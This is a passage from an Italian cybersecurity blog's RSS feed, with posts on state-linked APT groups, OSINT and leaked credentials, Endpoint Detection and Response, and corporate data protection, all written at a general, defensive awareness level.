&lt;p&gt;In egual modo le diverse Agenzie di Intelligence cercano di creare connessioni tra questi gruppi e i vari stati. Un esempio interessante è quanto fatto dagli Israeliani nel caso di un programma Iraniano di sorveglianza della popolazione: prima sono riusciti a &lt;strong&gt;ricostruire l’intero programma&lt;/strong&gt; e ad entrare in possesso dei dati e poi &lt;strong&gt;lo hanno associato ad un gruppo operante in collaborazione con i russi&lt;/strong&gt;. Il programma in questione è &lt;a href=&#34;https://research.checkpoint.com/2018/domestic-kitten-an-iranian-surveillance-operation/&#34;&gt;«Domestic Kitten»&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Le attività di sorveglianza attraverso malware di diverso tipo sono le microspie del terzo millennio: nel caso di “NetTraveler is Running!” l’obiettivo era &lt;strong&gt;monitorare le attività di circa 400 persone&lt;/strong&gt; di alto profilo, prevalentemente ufficiali governativi e diplomatici, in 40 paesi.
Tutto ebbe inizio con ATP 1 e gli attacchi TitanRain che colpirono il Ministero della Difesa degli Stati Uniti e GhostNet, una rete di macchine compromesse distribuite tra America, Europa e Asia. Fu probabilmente una delle prime iniziative di questo tipo collegabili alla Cina.&lt;/p&gt;

&lt;h2 id=&#34;le-organizzazioni-apt-in-attività&#34;&gt;Le organizzazioni APT in attività&lt;/h2&gt;

&lt;p&gt;Esistono diverse liste che hanno l’obiettivo di mantenere aggiornate le informazioni su queste organizzazioni, ecco alcune attualmente in attività:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;APT 39 - attribuibile all’Iran, agisce prevalentemente in medio oriente;&lt;/li&gt;
&lt;li&gt;APT 33 - attribuibile all’Iran, è presentemente attiva nello spionaggio nei confronti delle industri aerospaziali ed energetiche;&lt;/li&gt;
&lt;li&gt;APT 34 - attribuibile all’Iran, è presentemente attiva nei confronti di istituzioni governative e finanziarie;&lt;/li&gt;
&lt;li&gt;APT 41 «Double Dragon» - attribuibile alla Cina e specializzata nelle intrusioni nell’industria del gaming;&lt;/li&gt;
&lt;li&gt;APT 40 - attribuibile alla Cina e storicamente attiva nel sudest asiatico, ha come obiettivi preferiti energia e difesa;&lt;/li&gt;
&lt;li&gt;APT 38 - attribuibile alla Corea del Nord e attivo nei confronti di organizzazioni finanziarie occidentali;&lt;/li&gt;
&lt;li&gt;APT 37 - attribuibile alla Corea del Nord e principalmente attivo nei confronti della Corea del Sud;&lt;/li&gt;
&lt;li&gt;APT 32 «OceanLotus Group» - attribuibile al Vietnam;&lt;/li&gt;
&lt;li&gt;APT 30 - attribuibile alla Cina, molto attiva nella diffusione di malware per attacchi sul lungo periodo;&lt;/li&gt;
&lt;li&gt;APT 29 - attribuibile alla Russia e specializzato nello spionaggio verso i governi dell’Europa Occidentale;&lt;/li&gt;
&lt;li&gt;APT 28 «Tsar Team» - attribuibile alla Russia, attivo nel Caucaso e nei confronti delle installazioni NATO;&lt;/li&gt;
&lt;li&gt;APT 19 «Codoso Team» - attribuibile alla Cina e ha come obiettivi il settore legale e quello degli investimenti.&lt;/li&gt;
&lt;li&gt;APT 18 «Wekby» - attribuibile alla Cina, sono i creatori di Gh0st Rat;&lt;/li&gt;
&lt;li&gt;APT 17 «Deputy Dog» - attribuibile alla Cina; famosi alcuni attacchi contro istituzioni governative statunitensi condotti con il malware «Blackcoffe»;&lt;/li&gt;
&lt;li&gt;APT 16 - attribuibile alla Cina e molto attivo nei confronti di Taiwan e Giappone;&lt;/li&gt;
&lt;li&gt;APT 12 «Calc Team» - attribuibile alla Cina e attivo contro la stampa occidentale;&lt;/li&gt;
&lt;li&gt;APT 1 - direttamente attribuibile all’Esercito Popolare di Liberazione Cinese;&lt;/li&gt;
&lt;/ul&gt;
</description>
       </item>
       
       <item>
         <title>Alla ricerca delle credenziali perdute: l&#39;analisi OSINT</title>
         <link>https://blog.cybergon.com/posts/alla-ricerca-delle-credenziali-perdute-analisi-osint/</link>
         <pubDate>Tue, 07 Jul 2020 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Fabio Crestani</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/alla-ricerca-delle-credenziali-perdute-analisi-osint/</guid>
         <description>

&lt;p&gt;Ti sarà sicuramente capitato di ricevere una telefonata da un numero sconosciuto, salvarlo e andare a visualizzare la foto di quella persona su WhatsApp per verificare chi fosse. Questa, anche se in modo semplificato, si può definire un’analisi OSINT.&lt;/p&gt;

&lt;p&gt;OSINT: Open Source INTelligence.
Un’attività più longeva di quello che si pensa e largamente utilizzata nell’ambito della Cyber Security, ma non solo: giornalisti, reporter, agenzie investigative ne fanno uso per le loro attività.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/analisi-osint/cyber-intelligence.jpg&#34; alt=&#34;analisi-osint&#34; /&gt;&lt;/p&gt;

&lt;p&gt;L’analisi OSINT consiste nella raccolta delle informazioni pubbliche (Open Source, appunto) di una determinata azienda o persona.&lt;br /&gt;
Prima di comprenderne i possibili impatti (piccolo spoiler: decisamente importanti!), facciamo una breve digressione sulla base fondante di questa attività: &lt;strong&gt;la presenza delle informazioni che ci riguardano in rete&lt;/strong&gt;.&lt;/p&gt;

&lt;h3 id=&#34;l-informazione-in-rete-quando-diventa-pubblica&#34;&gt;L&amp;rsquo;informazione in rete: quando diventa pubblica&lt;/h3&gt;

&lt;p&gt;Le informazioni che ci riguardano e che carichiamo in rete – le foto, i documenti, la mail, la data di nascita – possono essere trovate, salvate e utilizzate. Capiamo come.&lt;/p&gt;

&lt;p&gt;In principio furono i &lt;em&gt;“data breach”&lt;/em&gt; (un esempio recente è &lt;a href=&#34;https://www.inps.it/nuovoportaleinps/default.aspx?itemDir=53578&#34;&gt;quello di Inps&lt;/a&gt;). Quando un’organizzazione subisce un attacco e questo ha successo, i dati vengono prima &lt;strong&gt;esfiltrati e poi pubblicati&lt;/strong&gt;; se ci siamo registrati su quel sito o abbiamo collaborato con quell&amp;rsquo;ente, allora è probabile che le nostre informazioni (nome, cognome, mail, data di nascita, ecc.) finiscano nel &lt;em&gt;Dark Web&lt;/em&gt;, il mercato nero della rete.
Esiste anche l’ipotesi che le informazioni sottratte non vengano subito pubblicate, ma vengano prima messe in vendita.&lt;/p&gt;

&lt;p&gt;Recuperare queste informazioni non è semplicissimo, ma è ciò che fanno i Cyber criminali (e, per fini opposti, gli esperti di Cyber Security ed Intelligence). La prima fase o &lt;em&gt;Fingerprint&lt;/em&gt; di un attacco è proprio quella di &lt;em&gt;“information gathering”&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;Un altro modo molto comune per raccogliere le informazioni di terzi è &lt;strong&gt;far leva sui Social Network&lt;/strong&gt;: se la privacy dei nostri profili di Facebook e Instagram non è settata correttamente, ad esempio, sarà molto facile recuperare il nome del nostro cane, il paese in cui abitiamo, le nostre abitudini.&lt;/p&gt;

&lt;p&gt;&lt;a href=&#34;https://blog.cybergon.com/posts/cybercrime-e-social-network-un-binomio-da-non-sottovalutare/&#34;&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/analisi-osint/approfondimento-social-network-cyber-crime.png&#34; alt=&#34;approfondimento-social-network-cyber-crime&#34; /&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;L’obiettivo è sempre uno: sfruttare queste informazioni per scopi illeciti. Il più diffuso è il &lt;em&gt;phishing&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;Più informazioni di una persona riesco a trovare, maggiore sarà &lt;strong&gt;l’accuratezza della comunicazione esca&lt;/strong&gt; e quindi la probabilità che quella persona abbocchi.&lt;/p&gt;

&lt;p&gt;Avere a disposizione il nome e cognome di una persona rappresenta già una quantità di nozioni utili a riuscire nell’attacco, specialmente se stiamo parlando di &lt;strong&gt;figure apicali&lt;/strong&gt;.
Sono molto comuni i casi di &lt;em&gt;CEO fraud&lt;/em&gt;: solo conoscendo il nome dell’amministratore delegato, si può impersonificarlo e creare &lt;strong&gt;mail credibili&lt;/strong&gt; con cui spingere i collaboratori dell’azienda a “cliccare sul link” o “scaricare l’allegato” o “fare questo bonifico urgente”, nel caso in cui la vittima designata sia una persona del reparto Finance.&lt;/p&gt;

&lt;p&gt;Informazioni aggiuntive come la data e il luogo di nascita possono rendere le comunicazioni del Cyber criminale ancora più credibili. Un esempio è il &lt;em&gt;Man in the Middle&lt;/em&gt;, ovvero quel tipo di attacco informatico in cui l’attaccante &lt;strong&gt;intercetta e si inserisce in una conversazione&lt;/strong&gt; (di solito trattative vie e-mail). Lo scopo è tipicamente pilotare la conversazione fino ad indirizzare un pagamento su un IBAN diverso da quello che prevedrebbe la trattativa.&lt;/p&gt;

&lt;h3 id=&#34;dall-individuo-all-azienda&#34;&gt;Dall&amp;rsquo;individuo all&amp;rsquo;azienda&lt;/h3&gt;

&lt;p&gt;Possedere queste informazioni è una &lt;em&gt;conditio sine qua non&lt;/em&gt; se si intende procedere con un attacco ben congeniato.
I motivi per cui un’azienda viene attaccata possono essere molti. Un’organizzazione criminale è interessata a &lt;strong&gt;fare soldi, ottenere altri dati da sfruttare in futuro o, ad esempio, le è stato commissionato un attacco da un competitor&lt;/strong&gt; per ottenere vantaggio competitivo.&lt;/p&gt;

&lt;p&gt;L’attacco informatico spesso e volentieri però, non è indirizzato a quella specifica azienda, ma &lt;strong&gt;passa dall’anello più debole di una qualsiasi organizzazione: le sue persone&lt;/strong&gt;. Spieghiamo meglio: se l’azienda “X” ha credenziali esposte di una o più persone del &lt;em&gt;Management Team&lt;/em&gt;, è probabile che il Cyber criminale le sfrutterà, indipendentemente da ciò che l’azienda può offrire in termini di dati/denaro.&lt;/p&gt;

&lt;p&gt;La chiave, per un attaccante, quindi è far leva sulle &lt;strong&gt;vulnerabilità delle identità digitali&lt;/strong&gt;. Essere vulnerabile nella propria identità digitale “privata” corrisponde molto spesso all’esserlo in quella professionale. Questo accade perché è piuttosto diffusa la pratica di &lt;strong&gt;utilizzare password correlate – o addirittura identiche - per utenze private e lavorative&lt;/strong&gt;; o ancora utilizzare la mail aziendale per iscriversi a servizi generici.
Un esempio noto di &lt;em&gt;data breach&lt;/em&gt; è LinkedIn, che nel 2012 si è visto esporre le credenziali di ben 6.5 milioni di account. Molte delle credenziali esposte erano verosimilmente correlate agli account aziendali degli utenti coinvolti.&lt;/p&gt;

&lt;p&gt;Lasciare tracce nel web come interessi, password, o addirittura una webcam esposta su internet (ad esempio quelle di sorveglianza che si collegano tramite wi-fi), è l’equivalente di chiudere la porta di casa a chiave ma lasciare spalancata la finestra sul retro.&lt;/p&gt;

&lt;p&gt;&lt;a href=&#34;https://hub.cybergon.com/iscriviti-ai-corsi-sulla-sicurezza-informatica&#34;&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/analisi-osint/corsi-1.PNG&#34; alt=&#34;corsi-1&#34; /&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Veniamo ora alla domanda che ti stai facendo dall’inizio di questo articolo:&lt;/p&gt;

&lt;h3 id=&#34;posso-capire-con-certezza-se-ho-subito-un-data-breach&#34;&gt;Posso capire con certezza se ho subito un Data Breach?&lt;/h3&gt;

&lt;p&gt;La risposta è duplice.&lt;/p&gt;

&lt;p&gt;Affidandoti ad esperti di &lt;em&gt;Threat Intelligence&lt;/em&gt;, puoi fare una ricerca più o meno approfondita sia nel Clear Web che nel Dark Web e scoprire se hai mai subito un data breach e su che sito. Questa è una buona notizia, perché ti permette di intervenire, ad esempio cambiando le password.
Tuttavia non è detto che l’attaccante pubblichi sempre le credenziali rubate. Spesso e volentieri l’organizzazione criminale, una volta recuperate le credenziali, ci fa &lt;strong&gt;quello che vuole, con chi vuole, quando vuole&lt;/strong&gt;. E ancora, puoi trovare delle credenziali esposte, ma non puoi sapere con certezza da quanto tempo siano presenti.&lt;/p&gt;

&lt;p&gt;Questo secondo punto è anche il motivo per cui è difficile stabilire con certezza quando è il caso di effettuare un’analisi OSINT sulla propria persona. L’urgenza varia e bisogna considerare alcuni aspetti:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;le abitudini di Cyber Security: ad esempio &lt;strong&gt;cambiare spesso password&lt;/strong&gt; e utilizzare un &lt;strong&gt;password manager&lt;/strong&gt; sono buone abitudini che abbassano – ma non eliminano del tutto – il rischio di essere violati;&lt;/li&gt;
&lt;li&gt;la rilevanza professionale: una figura apicale avrà sempre più &lt;em&gt;appeal&lt;/em&gt; di una di staff;&lt;/li&gt;
&lt;li&gt;evidenza di accessi non autorizzati;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Abbiamo intitolato questo articolo “Alla ricerca delle credenziali perdute”, aggiungiamo che se sono perdute e pubblicate, è assolutamente possibile ritrovarle. Internet non dimentica.&lt;/p&gt;

&lt;hr /&gt;

&lt;p&gt;Vuoi avere maggiori informazioni? Hai altre curiosità? &lt;a href=&#34;https://cybergon.com/about-us.html&#34;&gt;Prenota il tuo speed date&lt;/a&gt; con noi e ponici le tue domande!&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Rilevare e rispondere alle minacce con l&#39;Endpoint Detection and Response</title>
         <link>https://blog.cybergon.com/posts/rilevare-rispondere-alle-minacce-con-endpoint-detection-response/</link>
         <pubDate>Thu, 25 Jun 2020 10:36:01 +0000</pubDate>
         <authors>
         
              
             <author>Filadelfio Emanuele</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/rilevare-rispondere-alle-minacce-con-endpoint-detection-response/</guid>
         <description>

&lt;p&gt;I sistemi di Endpoint Detection and Response (EDR) hanno l’obiettivo di risolvere i limiti tipici degli antivirus per aumentare la protezione della postazione di lavoro in un contesto di Data Loss Prevention (DLP). Ecco come funzionano e quali vantaggi comportano per le aziende.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/endpoint-detection-response/endpoint_detection_response_edr_security.jpg&#34; alt=&#34;endpoint-detection-response&#34; /&gt;&lt;/p&gt;

&lt;p&gt;La protezione della postazione di lavoro (endpoint) assume un ruolo di estrema importanza all’interno di un piano per migliorare il livello di security in azienda e la sicurezza dei dati aziendali in un contesto di &lt;a href=&#34;https://www.cybersecurity360.it/soluzioni-aziendali/data-loss-prevention-strumenti-e-processi-per-la-sicurezza-dei-dati-aziendali/&#34;&gt;Data Loss Prevention (DLP)&lt;/a&gt;: ecco perché tutti i vendor di prodotti di endpoint security hanno inserito all’interno delle loro soluzioni moduli di Endpoint Detection and Response (EDR) per migliorare l’efficacia della protezione: andiamo ad analizzare come tali strumenti rispondono alle nuove necessità.&lt;/p&gt;

&lt;h3 id=&#34;endpoint-detection-and-response-cos-è-e-i-vantaggi&#34;&gt;Endpoint Detection and Response: cos&amp;rsquo;è e i vantaggi&lt;/h3&gt;

&lt;p&gt;L’Endpoint Detection and Response raggruppa &lt;strong&gt;gli strumenti avanzati che hanno il compito di rilevare minacce&lt;/strong&gt; su endpoint ed eseguire attività di indagine e risposta.&lt;/p&gt;

&lt;p&gt;Tali componenti tecnologiche sono ovviamente estendibili anche al mondo server per la protezione dei sistemi business critical, ma ricoprono un ruolo fondamentale nella protezione dei dispositivi utilizzati dai dipendenti o collaboratori.
Per comprendere meglio i benefici di tali strumenti e i loro utilizzi, dobbiamo analizzarli in un &lt;strong&gt;quadro completo di protezione aziendale&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Sembra superfluo e scontato indicare che &lt;strong&gt;un sistema antivirus è la base di partenza di questa pila tecnologica&lt;/strong&gt;, ma rimane ad oggi il fondamento.
Un normale antivirus basa la sua protezione su un sistema “a firme” ovvero confronta il file che sta verificando con il suo database fornito dal vendor. Tali database vengono aggiornati quotidianamente ma, come è possibile intuire, introducono un periodo di tempo necessario per:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;identificare un nuovo file malevolo;&lt;/li&gt;
&lt;li&gt;categorizzare la minaccia;&lt;/li&gt;
&lt;li&gt;inserirla nel database;&lt;/li&gt;
&lt;li&gt;rendere il database disponibile per il download;&lt;/li&gt;
&lt;li&gt;attendere che l’agente locale aggiorni le firme.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Questi passaggi, seppur standard nel mondo degli antivirus, introducono un tempo “buio” in cui la minaccia è presente, ma non è stata ancora inserita nei database degli antivirus.&lt;/p&gt;

&lt;p&gt;Oltre a questo limite temporale, dobbiamo aggiungere anche un limite strutturale: se un file o un eseguibile viene modificato anche solo parzialmente, cambiando ad esempio una riga del codice e ricompilandolo, risulterà come “nuovo” e &lt;strong&gt;dovrà passare attraverso il ciclo di analisi e categorizzazione&lt;/strong&gt;, aggiungendo un ulteriore &lt;em&gt;delay&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;Il limite più grosso di questi antivirus riguarda l’impossibilità di rispondere in modo efficace ad attacchi “0-day” ossia la mancanza di strumenti che permettano di identificare nuove minacce senza che queste siano già presenti nei database dei vendor. Le nuove minacce sono ormai uno dei punti di maggiore attenzione e di rischio per le aziende.&lt;/p&gt;

&lt;h3 id=&#34;edr-come-funziona&#34;&gt;EDR: come funziona&lt;/h3&gt;

&lt;p&gt;L’evoluzione degli attacchi e i limiti sopra descritti ha reso la necessità di &lt;strong&gt;estendere questo modello basato su firme con ulteriori tipologie di analisi e identificazione&lt;/strong&gt;, passando da un semplice confronto di file, all’analisi attiva del comportamento e delle attività che vengono eseguite dai file o dalle applicazioni usate dagli utenti.&lt;/p&gt;

&lt;p&gt;Questo nuovo approccio, tiene traccia di tutte le attività che vengono svolte, le correla tra di loro e applica algoritmi avanzati per identificare attività malevole.&lt;/p&gt;

&lt;p&gt;Tali attività prese puntualmente potrebbero non essere identificate come pericolose, ma la loro catena di attività può permettere l’identificazione di un malware. È quindi molto importante avere un sistema innovativo che utilizzi sistemi avanzati di machine learning.&lt;/p&gt;

&lt;p&gt;In base al grado di confidenza e alle configurazioni del prodotto, viene generato un alert e/o cancellato o messo in quarantena il file o l’applicazione.&lt;/p&gt;

&lt;p&gt;Con questi algoritmi avanzati, &lt;strong&gt;il livello di protezione è più alto rispetto al semplice antivirus&lt;/strong&gt;, ma ci sono ancora diversi limiti che hanno richiesto lo sviluppo di ulteriori strumenti di analisi e risposta.&lt;/p&gt;

&lt;p&gt;I limiti principali sono i seguenti:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;mancanza di visibilità globale;&lt;/li&gt;
&lt;li&gt;impossibilità di eseguire analisi storiche;&lt;/li&gt;
&lt;li&gt;mancanza della catena completa;&lt;/li&gt;
&lt;li&gt;mancanza di strumenti globali di risposta.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Il primo limite riguarda l’approccio dell’antivirus che mette in sicurezza il singolo dispositivo arrivando alla cancellazione o messa in quarantena del file, ma non permettendo di estendere tale protezione ad altri dispositivi presenti in azienda o sui server centrali.&lt;/p&gt;

&lt;p&gt;Il secondo riguarda la mancanza di uno strumento che permetta di correlare tutti gli eventi degli endpoint in modo strutturato e permettere di fare ricerche su eventuali minacce che non sono state rilevate precedentemente come malevole, ma che poi si sono rilevate tali.&lt;/p&gt;

&lt;p&gt;Il terzo riguarda la mancanza della visione completa delle attività svolte dal malware per ricostruire tutte le azioni svolte (quali file sono stati usati, quali modifiche sono state apportate, quali indirizzi sono stati contattati, quali dati sono stati esfiltrati).&lt;/p&gt;

&lt;p&gt;L’ultima riguarda l’impossibilità di eseguire comandi sui dispositivi remoti in modo centralizzato.&lt;/p&gt;

&lt;p&gt;I sistemi di Endpoint Detection and Response hanno quindi l’obiettivo di &lt;strong&gt;risolvere i limiti degli antivirus&lt;/strong&gt; elencati sopra, permettendo di avere un quadro completo ed una &lt;strong&gt;visibilità il più possibile dettagliata e accurata&lt;/strong&gt; dei client presenti in azienda.&lt;/p&gt;

&lt;p&gt;Molti vendor stanno proponendo i sistemi antimalware ed Endpoint Detection and Response come &lt;strong&gt;componenti aggiuntivi della protezione base&lt;/strong&gt; e in alcuni casi permettono di utilizzare antivirus di altri vendor.
È ovvio che la protezione migliore si ottiene con lo stack completo, meglio se dello stesso produttore, ma per risolvere tematiche di investimento o di effort di sostituzione dell’antivirus attuale esistono diverse soluzioni ibride.&lt;/p&gt;

&lt;p&gt;Il trend tecnologico e di mercato propone &lt;strong&gt;soluzioni Endpoint Detection and Response con console in cloud&lt;/strong&gt; per risolvere un altro limite: con lo smart working alimentato dal periodo di quarantena, i dispositivi passano la maggior parte del loro tempo fuori dalla rete aziendale e devono essere protetti costantemente.&lt;/p&gt;

&lt;p&gt;Il “vecchio approccio” nell’ambito dei sistemi di protezione poneva attenzione a difendere il perimetro dell’azienda, che è indispensabile e necessario, ma non più sufficiente.&lt;/p&gt;

&lt;p&gt;Dobbiamo essere consci che &lt;strong&gt;il modo di lavorare degli utenti è cambiato e continuerà ad evolvere nel tempo&lt;/strong&gt; e serve dotarsi di strumenti avanzati che sfruttino machine learning e inseriscano componenti di AI.&lt;/p&gt;

&lt;h3 id=&#34;caratteristiche-aggiuntive-di-un-edr&#34;&gt;Caratteristiche aggiuntive di un EDR&lt;/h3&gt;

&lt;p&gt;Oltre a quanto descritto sopra, i sistemi Endpoint Detection and Response stanno evolvendo velocemente. Alcune delle funzionalità utili messe a disposizione sono:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Rilevare attacchi attraverso l’analisi degli &lt;em&gt;IOC (Indicator of Compromise)&lt;/em&gt;. Per IOC si intende qualunque indicatore che identifichi una possibile compromissione. Nei bollettini emessi dalle aziende del settore o dagli organi nazionali relativi alla sicurezza sono sempre incluse liste di IP, nomi file o altri dati che possono essere ricercati tramite EDR all’interno della propria azienda. Se, ad esempio, viene segnalato un IP pubblico malevolo o un nome file noto usato all’interno di campagne di phishing è possibile eseguire una ricerca puntuale tramite EDR per capire se l’azienda ha subito o sta subendo quella tipologia di attacco.&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;Strumenti per l’accesso diretto sul dispositivo. Per rispondere velocemente a un eventuale compromissione, risulta utile per il tecnico avere uno strumento per eseguire attività remote sul client in questione. Se aggiungiamo la complessità dello smart working,non sempre è possibile avere accesso al dispositivo in tempi brevi. Per questo motivo, tramite EDR e la console cloud si può accedere direttamente al client eventualmente infetto ed eseguire azioni più o meno invasive, fino alla messa in quarantena dell’interno dispositivo.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h3 id=&#34;conclusioni-e-consigli&#34;&gt;Conclusioni e consigli&lt;/h3&gt;

&lt;p&gt;Dotarsi in azienda di un sistema antivirus con antimalware ed Endpoint Detection and Response è un passo importante per &lt;strong&gt;aumentare il livello di protezione&lt;/strong&gt;.
È consigliato scegliere prodotti dello stesso vendor per semplificare l’integrazione, ma non è un vincolo.&lt;/p&gt;

&lt;p&gt;I sistemi &lt;strong&gt;Endpoint Detection and Response&lt;/strong&gt; hanno alcuni aspetti da non sottovalutare:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;il grado di incertezza nell’identificare minacce;&lt;/li&gt;
&lt;li&gt;la complessità nella gestione completa di tutti gli strumenti messi a disposizione.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Il primo punto è intrinseco nell’applicazione di modelli che permettono di &lt;strong&gt;identificare comportamenti anomali&lt;/strong&gt;, ma che inseriscono un grado di errore che va gestito, compreso e corretto giornalmente.&lt;/p&gt;

&lt;p&gt;Il secondo è legato al livello avanzato di protezione che richiede skill e competenze verticali.&lt;/p&gt;

&lt;p&gt;Le domande che ogni azienda deve farsi prima di dotarsi di sistemi di questa tipologia sono: “Chi gestirà il tool? Chi controllerà che il funzionamento sia corretto? Chi eseguirà attività di fine tuning? Chi riceverà gli alert ed eseguirà l’analisi?”.&lt;/p&gt;

&lt;p&gt;Le strade sono principalmente due:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;dotarsi di competenze interne con attenzione al limite della copertura oraria;&lt;/li&gt;
&lt;li&gt;appoggiarsi a fornitori esterni che abbiamo la completa padronanza dello strumento.&lt;/li&gt;
&lt;/ol&gt;

&lt;hr /&gt;

&lt;p&gt;👉 &lt;a href=&#34;https://www.cybersecurity360.it/soluzioni-aziendali/endpoint-detection-and-response-per-rilevare-e-rispondere-alle-minacce-cose-e-come-funziona/&#34;&gt;Il seguente articolo è stato scritto per Cybersecurity360.it&lt;/a&gt; 👈&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Data Protection: strumenti e processi per la sicurezza dei dati aziendali</title>
         <link>https://blog.cybergon.com/posts/i-sistemi-di-data-protection/</link>
         <pubDate>Thu, 11 Jun 2020 10:36:01 +0000</pubDate>
         <authors>
         
              
             <author>Filadelfio Emanuele</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/i-sistemi-di-data-protection/</guid>
         <description>

&lt;p&gt;I sistemi di Data Protection devono ormai far parte integrante dei programmi di sicurezza aziendale in quanto necessari a proteggere il prezioso patrimonio informativo. Ecco gli strumenti e i processi da mettere in atto.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/sistemi-data-loss-prevention/data-loss-prevention-2.jpeg&#34; alt=&#34;i-sistemi-di-data-loss-prevention&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Il dato: &lt;strong&gt;l&amp;rsquo;asset più importante&lt;/strong&gt; che ogni azienda giornalmente costruisce, alimenta, modifica, usa e per cui il suo danneggiamento impatta direttamente il business: è questo il motivo per cui qualunque organizzazione, grande o piccola che sia, dovrebbe dotarsi di un sistema di Data Protection che consenta non solo di preservare il prezioso patrimonio informativo, ma anche di gestirlo nella sua eterogeneità.&lt;/p&gt;

&lt;p&gt;Le tipologie di dati, infatti, sono tra le più differenti: dal &lt;strong&gt;dato strutturato contenuto in record di database&lt;/strong&gt; o in altri repository al &lt;strong&gt;dato destrutturato&lt;/strong&gt; contenuto all’interno di mail, file, media, website e via dicendo. Ovviamente non tutti i dati hanno lo stesso livello di riservatezza e criticità per l’azienda e richiedono quindi diversi livelli di attenzione.&lt;/p&gt;

&lt;p&gt;Per fare solo un esempio, i dati di ricerca di un farmaco sperimentale di un’azienda farmaceutica o un progetto innovativo per un nuovo prodotto richiedono strumenti e processi per preservarne la riservatezza e l’integrità che non sono invece richiesti per i contenuti statici del sito internet dell’azienda stessa o per la mail degli “auguri di Natale” scambiata tra i dipendenti.
In ogni caso è comunque necessario ridurre la possibilità che il dato venga perso, sia esso trafugato da malintenzionati (data leak) o perso non intenzionalmente (data loss), tenendo presente l’impatto economico che può avere sull’azienda.&lt;/p&gt;

&lt;h3 id=&#34;data-protection-un-vero-e-proprio-ecosistema&#34;&gt;Data Protection: un vero e proprio ecosistema&lt;/h3&gt;

&lt;p&gt;Quando si parla di Data Protection si intende un ecosistema di strumenti, tools e processi cha hanno l’obiettivo di proteggere i dati sensibili e importanti per il business dell’azienda, con particolare focus su:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;classificazione&lt;/strong&gt;: ci sono differenti tipologie di dati ed è necessario la classificazione degli stessi prestando attenzione al livello di sensibilità e criticità dell’informazione in esso contenuta;&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;violazione&lt;/strong&gt;: è importante identificare con celerità ogni violazione alle policy interne o accessi non autorizzati da parte di terzi, siano essi interni o esterni. Deve essere presente un sistema automatico che possa generare &lt;em&gt;alert&lt;/em&gt; a fronte del verificarsi di questi casi e sistemi di mitigazione a disposizione dell’azienda;&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;protezione&lt;/strong&gt;: devono essere realizzati, mantenuti e fatti evolvere i sistemi di protezione, che siano essi statici o dinamici. L’obiettivo primario deve essere quello di prevenire ogni perdita per furto, attacco informatico o semplicemente errore umano;&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;compliance&lt;/strong&gt;: è necessario verificare continuamente di avere policy compliant con i vari regolamenti a cui si deve sottostare (ad esempio, il &lt;a href=&#34;https://www.cybersecurity360.it/legal/privacy-dati-personali/adeguamento-pratico-al-gdpr-best-practice-per-mettersi-in-regola-con-gli-adempimenti-privacy/&#34;&gt;GDPR&lt;/a&gt;).&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3 id=&#34;la-giusta-strategia-di-data-protection&#34;&gt;La giusta strategia di Data Protection&lt;/h3&gt;

&lt;p&gt;Ci sono differenti strategie possibili ed è sempre necessario implementarne più di una per poter raggiungere un livello di protezione soddisfacente per la propria realtà aziendale.&lt;/p&gt;

&lt;p&gt;Gli ambiti su cui operano questi sistemi sono:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Data in Transit protection&lt;/strong&gt; (a volte definita anche “Data in Motion protection”): si focalizza sulla protezione del dato in transito, sia all’interno della rete privata che tramite internet. Molto spesso si sottovaluta questa parte in quanto si pone maggior attenzione sul dato memorizzato e non sul percorso che esso compie per raggiungere la destinazione.&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;Data in Use protection&lt;/strong&gt;: si focalizza sulla protezione del dato in uso, in continua modifica o aggiornamento da parte dell’utente o delle applicazioni. Per la loro natura, le informazioni contenute in questa forma sono particolarmente critiche perché rappresentano l’operatività reale e puntuale degli utenti e sono vulnerabili ad attacchi esterni.&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;Data at Rest protection&lt;/strong&gt;: si focalizza sulla protezione del dato memorizzato all’interno dei vari dispositivi o archiviato su vari supporti storage. Il dato non è quindi in transito o in uso e per questo motivo si presuppone che sia meno vulnerabile. Il suo valore è sicuramente alto ed è necessario proteggerlo con strumenti adeguati.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

